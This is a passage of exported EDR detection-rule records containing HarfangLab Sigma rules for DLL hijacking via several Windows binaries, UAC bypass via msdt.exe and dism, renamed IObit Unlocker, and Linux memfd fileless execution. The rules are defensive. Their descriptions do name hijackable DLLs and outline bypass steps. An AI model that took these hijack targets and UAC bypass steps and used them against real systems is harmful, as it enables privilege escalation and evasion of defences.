'\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84419344-a6ed-4a37-9c60-2f16ddacf2ae",
"rule_name": "DLL Hijacking via optionalfeatures.exe",
"rule_description": "Detects potential Windows DLL Hijacking via optionalfeatures.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84500a2e-96cf-41a3-9e82-7c40ea436d83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093445Z",
"creation_date": "2026-03-23T11:45:34.093447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093451Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass",
"https://attack.mitre.org/techniques/T1574/002/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1574_002_uac_bypass_msdt.yml",
"content": "title: UAC bypass via msdt.exe\nid: 84500a2e-96cf-41a3-9e82-7c40ea436d83\ndescription: |\n Detects the UAC bypass for the Microsoft Support Diagnostic Tool (msdt.exe) by hijacking BluetoothDiagnosticUtil.dll.\n When the 32bit version of msdt.exe is launch with BluetoothDiagnostic package, the binary reopens itself with high privileges.\n Then, the elevated msdt.exe launches sdiagnhost.exe with elevated privileges and a missing DLL from user directory.\n Attackers can replace this missing DLL BluetoothDiagnosticUtil.dll to elevated privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\nreferences:\n - http://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n - https://attack.mitre.org/techniques/T1574/002/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2022/02/04\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil.dll'\n\n filter_signed:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84500a2e-96cf-41a3-9e82-7c40ea436d83",
"rule_name": "UAC bypass via msdt.exe",
"rule_description": "Detects the UAC bypass for the Microsoft Support Diagnostic Tool (msdt.exe) by hijacking BluetoothDiagnosticUtil.dll.\nWhen the 32bit version of msdt.exe is launch with BluetoothDiagnostic package, the binary reopens itself with high privileges.\nThen, the elevated msdt.exe launches sdiagnhost.exe with elevated privileges and a missing DLL from user directory.\nAttackers can replace this missing DLL BluetoothDiagnosticUtil.dll to elevated privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the library, as well as the library itself to look for malicious content or actions.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "848a9f71-06bf-4429-aec7-c38ba26072c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594086Z",
"creation_date": "2026-03-23T11:45:34.594090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594098Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_brdifxapi.yml",
"content": "title: DLL Hijacking via brdifxapi.exe\nid: 848a9f71-06bf-4429-aec7-c38ba26072c9\ndescription: |\n Detects potential Windows DLL Hijacking via brdifxapi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BrDifxapi.exe'\n ImageLoaded|endswith:\n - '\\brlogapi.dll'\n - '\\brlogapi64.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Brother\\'\n - '?:\\Program Files (x86)\\Brother\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Brother\\'\n - '?:\\Program Files (x86)\\Brother\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Dell Inc.'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "848a9f71-06bf-4429-aec7-c38ba26072c9",
"rule_name": "DLL Hijacking via brdifxapi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via brdifxapi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84a338af-c81a-4279-b01a-f93486efc9ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591674Z",
"creation_date": "2026-03-23T11:45:34.591677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591685Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dcdiag.yml",
"content": "title: DLL Hijacking via dcdiag.exe\nid: 84a338af-c81a-4279-b01a-f93486efc9ea\ndescription: |\n Detects potential Windows DLL Hijacking via dcdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dcdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\dsrole.dll'\n - '\\iphlpapi.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84a338af-c81a-4279-b01a-f93486efc9ea",
"rule_name": "DLL Hijacking via dcdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dcdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84a4a652-d451-45f3-bbdd-9b17f02d3387",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.521951Z",
"creation_date": "2026-03-23T11:45:34.093191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093205Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_dismcore.yml",
"content": "title: UAC Bypass Executed via dism\nid: 84a4a652-d451-45f3-bbdd-9b17f02d3387\ndescription: |\n Detects the execution of the dism.exe/dismhost.exe UAC bypass, involving the hijacking of the dismcore.dll or api-ms-win-core-kernel32-legacy-l1.dll DLLs.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_dism:\n Image: '?:\\Windows\\System32\\dism.exe'\n ImageLoaded|endswith: '\\dismcore.dll'\n\n selection_dismhost:\n Image|endswith: '\\DismHost.exe'\n ImageLoaded|endswith: '\\api-ms-win-core-kernel32-legacy-l1.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84a4a652-d451-45f3-bbdd-9b17f02d3387",
"rule_name": "UAC Bypass Executed via dism",
"rule_description": "Detects the execution of the dism.exe/dismhost.exe UAC bypass, involving the hijacking of the dismcore.dll or api-ms-win-core-kernel32-legacy-l1.dll DLLs.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84b51994-8a90-450f-aa06-cf5f5cac2232",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627232Z",
"creation_date": "2026-03-23T11:45:34.627234Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627238Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_renamed_iobitunlocker.yml",
"content": "title: Execution of Renamed IObit Unlocker\nid: 84b51994-8a90-450f-aa06-cf5f5cac2232\ndescription: |\n Detects the execution of a renamed IObit Unlocker, a tool that may be exploited by adversaries to disable or modify security tools to avoid detection of malicious activities.\n IObit Unlocker is a legitimate utility designed to remove locked files or folders, but its use can indicate unauthorized attempts to circumvent security measures.\n It is recommended to verify if the execution of IObit Unlocker is authorized, investigate the process for malicious behavior, check file integrity, and monitor for suspicious modifications to security-related tools or processes.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.IOBitUnlocker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Description: 'Unlocker'\n - Product: 'Unlocker'\n\n selection_company:\n Company|contains: 'IObit'\n\n selection_signature:\n ProcessSigned: 'true'\n ProcessSignature: 'IObit CO., LTD'\n\n # This is handled by the rule 74259026-c475-45cc-bac2-fb2a5768e419\n filter_image:\n Image|endswith: '\\IObitUnlocker.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84b51994-8a90-450f-aa06-cf5f5cac2232",
"rule_name": "Execution of Renamed IObit Unlocker",
"rule_description": "Detects the execution of a renamed IObit Unlocker, a tool that may be exploited by adversaries to disable or modify security tools to avoid detection of malicious activities.\nIObit Unlocker is a legitimate utility designed to remove locked files or folders, but its use can indicate unauthorized attempts to circumvent security measures.\nIt is recommended to verify if the execution of IObit Unlocker is authorized, investigate the process for malicious behavior, check file integrity, and monitor for suspicious modifications to security-related tools or processes.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84ceb67c-e594-4e0c-9494-ecacb9897967",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588446Z",
"creation_date": "2026-03-23T11:45:34.588450Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588457Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wksprt.yml",
"content": "title: DLL Hijacking via wksprt.exe\nid: 84ceb67c-e594-4e0c-9494-ecacb9897967\ndescription: |\n Detects potential Windows DLL Hijacking via wksprt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wksprt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\webservices.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84ceb67c-e594-4e0c-9494-ecacb9897967",
"rule_name": "DLL Hijacking via wksprt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wksprt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84e95c4d-07d4-49bc-90f2-6545f7ef9b88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074540Z",
"creation_date": "2026-03-23T11:45:34.074542Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074547Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/declawing-pumakit",
"https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html",
"https://man7.org/linux/man-pages/man2/memfd_create.2.html",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_fileless_execution_using_memfd.yml",
"content": "title: Fileless Process Execution via Memfd\nid: 84e95c4d-07d4-49bc-90f2-6545f7ef9b88\ndescription: |\n Detects the execution of a process with an anonymous image file created via \"memfd_create()\".\n The \"memfd_create()\" syscall creates an anonymous file that lives in RAM and has a volatile backing storage.\n Once all references to the file are dropped, it is automatically released.\n This method, called fileless execution, is typically used by malware to avoid signature-based detection from common security tools.\n It is recommended to ensure that both the process and its parent had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://www.elastic.co/security-labs/declawing-pumakit\n - https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html\n - https://man7.org/linux/man-pages/man2/memfd_create.2.html\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/18\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith: 'memfd:'\n\n exclusion_lxc:\n Image: 'memfd:lxc-attach'\n\n exclusion_containers:\n Ancestors|contains:\n # Containerd\n - 'bin/containerd-shim'\n # Docker\n - 'bin/docker-containerd-shim'\n - '/usr/bin/dockerd'\n - '|/usr/sbin/dockerd|'\n - '/usr/libexec/docker/docker-runc-current'\n # An OCI container runtime monitor.\n - '/usr/bin/conmon'\n # Open source tool for developing, managing, and running containers.\n - '/usr/bin/podman'\n # The NVIDIA Container Toolkit is a collection of libraries and utilities enabling users to build and run GPU-accelerated containers.\n - 'bin/nvidia-container-cli'\n\n exclusion_image:\n Image:\n - 'memfd:buildah-chroot-exec'\n - 'memfd:buildah-chroot-runtime'\n - 'memfd:dwarfs'\n - 'memfd:runc_cloned:/proc/self/exe'\n - 'memfd:crun_cloned:/proc/self/exe'\n\n exclusion_runtime:\n Image: 'memfd:runtime'\n ParentImage:\n - '*/usr/lib/x86_64-linux-gnu/appimagelauncher/binfmt-bypass'\n - '/usr/lib/systemd/systemd'\n\n exclusion_self:\n Image: 'memfd:crun_cloned:/proc/self/exe'\n GrandparentImage:\n - '/usr/libexec/gnome-terminal-server'\n - '/usr/share/code/code'\n\n exclusion_datadog:\n Image: 'memfd:spawn_worker_trampoline'\n CommandLine|startswith: 'datadog-ipc-helper'\n\n exclusion_zen_browser:\n - Image:\n - 'memfd:exec'\n - 'memfd:squashfuse'\n CommandLine|contains: 'squashfuse */zen-x86_64.AppImage *'\n - Image:\n - 'memfd:squashfuse'\n - 'memfd:unsquashfs'\n ParentImage|endswith: '/zen-browser'\n\n exclusion_crun:\n ProcessImage: 'memfd:runc_cloned:/proc/self/exe'\n ProcessCommandLine|startswith: '/usr/bin/crun '\n\n exclusion_sophos:\n ProcessImage: 'memfd:/sophos-subprocess-*-exec?'\n ProcessCommandLine:\n - 'runtimedetections-trigger'\n - '/opt/sophos-spl/plugins/runtimedetections/bin/perf-sensor'\n\n exclusion_fireeye:\n ProcessImage: 'memfd:/capsule?-sensor-*-exec?'\n ProcessCommandLine: '/opt/fireeye/bin/perf-sensor'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
